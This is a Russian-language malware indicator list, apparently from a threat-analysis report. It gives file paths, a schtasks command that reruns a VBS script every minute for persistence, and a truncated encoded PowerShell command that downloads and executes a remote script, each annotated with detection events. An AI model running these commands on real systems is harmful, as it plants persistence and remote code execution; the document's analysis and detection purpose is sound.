Техническая информация
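- %WINDIR%\Tasks\w2k18.job
- %WINDIR%\Temp\windllx86.vbs
  (Примечание: имя w2k18.job совпадает с именем задачи планировщика w2k18 из перечисленных ниже команд schtasks, а windllx86.vbs — это сценарий, который указан в этой задаче и запускается через wscript.exe и cmd.exe. Оба пути можно использовать как индикаторы при проверке узла.)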
- '<SYSTEM32>\wscript.exe' "%WINDIR%\temp\windllx86.vbs"
- '<Полный путь к файлу>' hu3hu3
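- '<SYSTEM32>\cmd.exe' /C "schtasks /create /sc minute /mo 1 /tn w2k18 /tr '%WINDIR%\temp\windllx86.vbs'"
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn w2k18 /tr '%WINDIR%\temp\windllx86.vbs'
  (Примечание: параметры /sc minute /mo 1 задают запуск задачи w2k18 каждую минуту, то есть это механизм закрепления в системе. Создание задачи фиксируется событием 4698 журнала безопасности (при включённом аудите) и событием 106 журнала TaskScheduler/Operational. Признак для правила обнаружения: schtasks.exe с /create и значением /tr, указывающим на сценарий в %WINDIR%\temp.)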
- '<SYSTEM32>\cmd.exe' /C %WINDIR%\temp\windllx86.vbs
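- '<SYSTEM32>\cmd.exe' /C "powershell.exe -nop -ep bypass -ec JABpAHMAIAA9ACAASQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKA...
  (Примечание: -nop, -ep bypass и -ec — сокращения от -NoProfile, -ExecutionPolicy Bypass и -EncodedCommand. Аргумент -ec содержит Base64 от текста в кодировке UTF-16LE. Видимая часть декодируется в `$is = IEX(new-object System.Net.WebClient).DownloadString(`, то есть команда загружает сценарий по сети и выполняет его в памяти. Остальная часть строки, включая адрес загрузки, на странице обрезана. Декодированный текст можно получить из события 4104 журнала PowerShell при включённой регистрации блоков сценариев.)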